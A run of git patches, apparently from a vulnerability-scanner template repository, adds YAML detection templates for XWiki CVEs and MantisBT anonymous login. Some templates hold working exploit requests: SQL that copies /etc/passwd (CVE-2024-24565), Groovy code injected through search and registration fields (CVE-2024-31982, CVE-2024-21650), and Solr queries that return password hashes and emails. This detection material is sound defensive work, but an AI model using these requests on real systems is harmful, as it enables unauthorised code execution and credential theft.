-35,3 +35,4 @@ http: - 'contains_all(body, "Model=", "Build=", "Macaddr=")' - 'status_code == 200' condition: and +# digest: 490a004630440220637a70951ffd4c3d81671b37a51e678c922a409e791bdbb538ad6cce7bb84fad0220303256e098c2a99c41e54b1518da46ac7d1910401c97102c6afaa5f2490973d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8e4a04a0031b934d5dd4732a07a28605723a76f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:06:45 +0000 Subject: [PATCH 0330/1841] Auto Generated Templates Checksum [Tue Jun 18 10:06:45 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 949a678047..f596a52152 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3327,13 +3327,14 @@ http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 -http/cves/2024/CVE-2024-3274.yaml:f86d17e3846a2056ffbcda16ab789507fc08c63e +http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 +http/cves/2024/CVE-2024-36837.yaml:da7655cdbaa359e08c4cd5e402702b217c7b9961 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -8660,7 +8661,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f97353790358110b1161c8e683260eab68c943d6 +templates-checksum.txt:a2d303ec43c214cd40e0e28d114f45ac960d7e77 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 694f866bc61fd801eaf3c3f9bc415d861a2ead82 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:08:36 +0000 Subject: [PATCH 0331/1841] Auto Template Signing [Tue Jun 18 10:08:36 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36837.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml index 14f7ff3d11..b51c4c7412 100644 --- a/http/cves/2024/CVE-2024-36837.yaml +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4a6ce994c755943b0c278c2a3ba85d5beab32f9d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 10:09:30 +0000 Subject: [PATCH 0332/1841] Auto Generated New Template Addition List [Tue Jun 18 10:09:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6d4fc0c62d..10c13059b0 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2024/CVE-2024-28995.yaml http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-3274.yaml +http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml From 26eade397eaf7d8ddf0e8bcc0d3746264601bb9e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:09:45 +0000 Subject: [PATCH 0333/1841] Auto Generated Templates Checksum [Tue Jun 18 10:09:45 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f596a52152..97799210de 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1929,7 +1929,7 @@ http/cves/2020/CVE-2020-7796.yaml:6157549eb38e8fc6de1a599af340892651ab2a72 http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2 http/cves/2020/CVE-2020-7961.yaml:6e6a2d87ac59b710e9f06ac8468de57cd0695f9a http/cves/2020/CVE-2020-7980.yaml:1b8c02806c66311834a931181b6acb7fada2bc9d -http/cves/2020/CVE-2020-8115.yaml:68173d36e231cef7317d8a24655cde2134bf2052 +http/cves/2020/CVE-2020-8115.yaml:0a84aa21d38f9a2892376783c4ea79a386141504 http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5 http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915 http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6 @@ -3334,7 +3334,7 @@ http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-36837.yaml:da7655cdbaa359e08c4cd5e402702b217c7b9961 +http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -8661,7 +8661,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a2d303ec43c214cd40e0e28d114f45ac960d7e77 +templates-checksum.txt:f8b0b07c018966642248df8c0cf0b0799fa87926 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 60a2d0554859c608ee0989064911d4fa768b35bc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 10:10:16 +0000 Subject: [PATCH 0334/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0a16726a69..00be36dff2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -22,6 +22,7 @@ on: - 'http/cves/2024/CVE-2024-31750.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-3274.yaml' + - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' From 45bc70c64c1eca6c88215aa3bc38e8e2d4c06637 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:11:19 +0000 Subject: [PATCH 0335/1841] Auto Template Signing [Tue Jun 18 10:11:19 UTC 2024] :robot: --- http/cves/2020/CVE-2020-8115.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 29bde95c57..babf5d8c01 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ecd7675c422b5c9949a8ab6d201f35ee87e4502aad45359f825eb31c2f2fbd72022100aa92159e5d4b1010b07101e6b6f47d858170d3f8e97aa5db3c6c7a259bfe4b71:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201c457a2f1b36aa9047f64d583625469bc74369b0b7e4aabe3b116e0738efe55c0221009fbcbd6ae813de05fe1f4fcd785a0cb566dba7d3d8f3ed26faf9555b57561095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a6266aa3cc8b31d980f12fb1cb733239c2263574 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 15:42:13 +0530 Subject: [PATCH 0336/1841] minor update --- http/cves/2023/CVE-2023-37645.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-37645.yaml b/http/cves/2023/CVE-2023-37645.yaml index dc81f35dcb..07aca4e59d 100644 --- a/http/cves/2023/CVE-2023-37645.yaml +++ b/http/cves/2023/CVE-2023-37645.yaml @@ -1,10 +1,11 @@ id: CVE-2023-37645 info: - name: eyoucms v1.6.3 - Information Disclosure Vulnerability + name: EyouCms v1.6.3 - Information Disclosure author: pussycat0x severity: medium - description: eyoucms v1.6.3 was discovered to contain an information disclosure vulnerability via the component /custom_model_path/recruit.filelist.txt. + description: | + EyouCms v1.6.3 was discovered to contain an information disclosure vulnerability via the component /custom_model_path/recruit.filelist.txt. impact: | An attacker can exploit this vulnerability to gain sensitive information. remediation: | From db0dd54146235029cd8e30276c9f5d867ecc765b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 15:45:36 +0530 Subject: [PATCH 0337/1841] trail space fix --- http/cves/2024/CVE-2024-24565.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-24565.yaml b/http/cves/2024/CVE-2024-24565.yaml index 9c30892788..0b17006f94 100644 --- a/http/cves/2024/CVE-2024-24565.yaml +++ b/http/cves/2024/CVE-2024-24565.yaml @@ -31,21 +31,21 @@ http: POST /_sql?types HTTP/1.1 Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 - + {"stmt":"CREATE TABLE {{table_name}}(info_leak STRING)"} - | POST /_sql?types HTTP/1.1 Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 - + {"stmt":"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)"} - | POST /_sql?types HTTP/1.1 Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 - + {"stmt":"SELECT * FROM {{table_name}} limit 100"} matchers-condition: and From dc084d1b28c7ff6496543bf041105bf15d6ffe3f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 18 Jun 2024 15:49:03 +0530 Subject: [PATCH 0338/1841] Create mantisbt-anonymous-login.yaml --- .../mantisbt-anonymous-login.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/default-logins/mantisbt-anonymous-login.yaml diff --git a/http/default-logins/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt-anonymous-login.yaml new file mode 100644 index 0000000000..818443dfef --- /dev/null +++ b/http/default-logins/mantisbt-anonymous-login.yaml @@ -0,0 +1,31 @@ +id: mantisbt-anonymous-login + +info: + name: mantisbt - Anonymous Login + author: pussycat0x + severity: medium + description: | + mantisbt Anonymous login were discovered. + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:662709064 + tags: default-logins,anonymous,mantisbt,default-login + +http: + - method: GET + path: + - '{{BaseURL}}/my_view_page.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'user-info">anonymous"' + - 'My View' + - 'Roadmap' + + - type: status + status: + - 200 From 3bc3dddb17588ad57536e2574eab5037063d3104 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 16:04:31 +0530 Subject: [PATCH 0339/1841] Create CVE-2023-48241.yaml --- http/cves/2023/CVE-2023-48241.yaml | 53 ++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2023/CVE-2023-48241.yaml diff --git a/http/cves/2023/CVE-2023-48241.yaml b/http/cves/2023/CVE-2023-48241.yaml new file mode 100644 index 0000000000..0bfe431889 --- /dev/null +++ b/http/cves/2023/CVE-2023-48241.yaml @@ -0,0 +1,53 @@ +id: CVE-2023-48241 + +info: + name: XWiki < 4.10.15 - Information Disclosure + author: ritikchaddha + severity: high + description: | + The Solr-based search suggestion provider that also duplicates as generic JavaScript API for search results in XWiki exposes the content of all documents of all wikis to anybody who has access to it, by default it is public. This exposes all information stored in the wiki (but not some protected information like password hashes). While there is a right check normally, the right check can be circumvented by explicitly requesting fields from Solr that don't include the data for the right check. This can be reproduced by opening /xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+ where is the URL of the XWiki installation. If this displays any results, the wiki is vulnerable. + impact: | + Successful exploitation could lead to disclosure of content of all documents of all wikis. + remediation: | + This has been fixed in XWiki 15.6RC1, 15.5.1 and 14.10.15 by not listing documents whose rights cannot be checked. + reference: + - https://jira.xwiki.org/browse/XWIKI-21138 + - https://nvd.nist.gov/vuln/detail/CVE-2023-48241 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-48241 + cwe-id: CWE-285 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2024,xwiki,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+" + - "{{BaseURL}}/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"reference":' + - 'title_":' + condition: or + + - type: dsl + dsl: + - 'contains(body, "services.localization.render")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and From 16077113fad72f9afe96e1268f95e1a4e0a9ce39 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 16:04:34 +0530 Subject: [PATCH 0340/1841] Create CVE-2023-50719.yaml --- http/cves/2023/CVE-2023-50719.yaml | 50 ++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2023/CVE-2023-50719.yaml diff --git a/http/cves/2023/CVE-2023-50719.yaml b/http/cves/2023/CVE-2023-50719.yaml new file mode 100644 index 0000000000..014823c5be --- /dev/null +++ b/http/cves/2023/CVE-2023-50719.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-50719 + +info: + name: XWiki < 4.10.15 - Sensitive Information Disclosure + author: ritikchaddha + severity: high + description: | + XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. + impact: | + Successful exploitation could lead to disclosure of the password hashes of all users. + remediation: | + This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. + reference: + - https://jira.xwiki.org/browse/XWIKI-21208 + - https://nvd.nist.gov/vuln/detail/CVE-2023-50719 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-50719 + cwe-id: CWE-359 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2024,xwiki,password,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=" + - "{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "hash:SHA" + - "XWikiUsers[0].password" + condition: and + + - type: status + status: + - 200 From 433b2767d1ac1a92ac131e05a8ec99b12959ba76 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 16:04:36 +0530 Subject: [PATCH 0341/1841] Create CVE-2023-50720.yaml --- http/cves/2023/CVE-2023-50720.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2023/CVE-2023-50720.yaml diff --git a/http/cves/2023/CVE-2023-50720.yaml b/http/cves/2023/CVE-2023-50720.yaml new file mode 100644 index 0000000000..7667b18a27 --- /dev/null +++ b/http/cves/2023/CVE-2023-50720.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-50720 + +info: + name: XWiki < 4.10.15 - Email Disclosure + author: ritikchaddha + severity: medium + description: | + The Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki's regular search interface. + impact: | + Successful exploitation could lead to disclosure of the email of all the users. + remediation: | + This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. + reference: + - https://jira.xwiki.org/browse/XWIKI-20371 + - https://nvd.nist.gov/vuln/detail/CVE-2023-50720 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-50720 + cwe-id: CWE-200 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2024,xwiki,email,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*" + - "{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "email :" + - "XWiki.XWikiUsers[0]" + - "email_checked" + condition: and + + - type: status + status: + - 200 From dabea4f515ac396c0eb7d8b6be9553bef793be87 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 16:05:02 +0530 Subject: [PATCH 0342/1841] Create CVE-2024-31982.yaml --- http/cves/2024/CVE-2024-31982.yaml | 48 ++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 http/cves/2024/CVE-2024-31982.yaml diff --git a/http/cves/2024/CVE-2024-31982.yaml b/http/cves/2024/CVE-2024-31982.yaml new file mode 100644 index 0000000000..d2b4aef227 --- /dev/null +++ b/http/cves/2024/CVE-2024-31982.yaml @@ -0,0 +1,48 @@ +id: CVE-2024-31982 + +info: + name: XWiki < 4.10.20 - Remote code execution + author: ritikchaddha + severity: critical + description: | + XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki. + impact: | + Successful exploitation could lead to remote code execution. + remediation: | + Apply the vendor-supplied patch or upgrade to a 14.10.20 ,15.5.4, 15.10-rc-1. + reference: + - https://jira.xwiki.org/browse/XWIKI-21472 + - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2858-8cfx-69m9 + - https://jira.xwiki.org/browse/XWIKI-21110 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-31982 + cwe-id: CWE-95 + epss-score: 0.0015 + epss-percentile: 0.50461 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2024,xwiki,rce + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20" + - "{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20" + + skip-variables-check: true + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'contains_all(body, "Hello from search text:42", "RSS feed")' + - 'contains(header, "text/javascript")' + - 'status_code == 200' + condition: and From b6f5bdbe45333774e76e329ea003ef8709fade7c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 16:05:04 +0530 Subject: [PATCH 0343/1841] Create CVE-2024-21650.yaml --- http/cves/2024/CVE-2024-21650.yaml | 84 ++++++++++++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 http/cves/2024/CVE-2024-21650.yaml diff --git a/http/cves/2024/CVE-2024-21650.yaml b/http/cves/2024/CVE-2024-21650.yaml new file mode 100644 index 0000000000..6e9bfbb105 --- /dev/null +++ b/http/cves/2024/CVE-2024-21650.yaml @@ -0,0 +1,84 @@ +id: CVE-2024-21650 + +info: + name: XWiki < 4.10.20 - Remote code execution + author: ritikchaddha + severity: critical + description: | + XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests. + impact: | + Successful exploitation could lead to remote code execution. + remediation: | + This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1. + reference: + - https://jira.xwiki.org/browse/XWIKI-21173 + - https://nvd.nist.gov/vuln/detail/CVE-2024-21650 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2024-21650 + cwe-id: CWE-95 + epss-score: 0.0015 + epss-percentile: 0.50461 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2024,xwiki,rce + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}%40{{rand_base(5)}}.com" + firstname: "%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%7D%7D%7B%7Bgroovy%7D%7Dservices.logging.getLogger%28%22attacker%22%29.error%28%22Attack+succeeded%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D" + lastname: "{{rand_base(5)}}" + +http: + - raw: + - | + GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1 + Host: {{Hostname}} + + - | + POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + parent=xwiki%3AMain.UserDirectory®ister_first_name={{firstname}}®ister_last_name={{lastname}}&xwikiname={{user}}®ister_password={{pass}}®ister2_password={{pass}}®ister_email="{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}} + + payloads: + path: + - + - /xwiki + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + skip-variables-check: true + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "Registration successful" + - "Attack succeeded" + - "Failed to execute the [groovy]" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: token + group: 1 + regex: + - data\-xwiki\-form\-token="([a-zA-Z0-9]+)"> + internal: true From 3d7413fa9846355d54ebb6e36d38e377f1896360 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 16:09:59 +0530 Subject: [PATCH 0344/1841] lint fix --- http/cves/2024/CVE-2024-21650.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-21650.yaml b/http/cves/2024/CVE-2024-21650.yaml index 6e9bfbb105..9e30861965 100644 --- a/http/cves/2024/CVE-2024-21650.yaml +++ b/http/cves/2024/CVE-2024-21650.yaml @@ -52,7 +52,7 @@ http: payloads: path: - - + - - /xwiki stop-at-first-match: true From 7a43bb34be94fe5c3b44649226425066eba949de Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 10:46:17 +0000 Subject: [PATCH 0345/1841] Auto Generated Templates Checksum [Tue Jun 18 10:46:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 97799210de..dd87d0aba6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1929,7 +1929,7 @@ http/cves/2020/CVE-2020-7796.yaml:6157549eb38e8fc6de1a599af340892651ab2a72 http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2 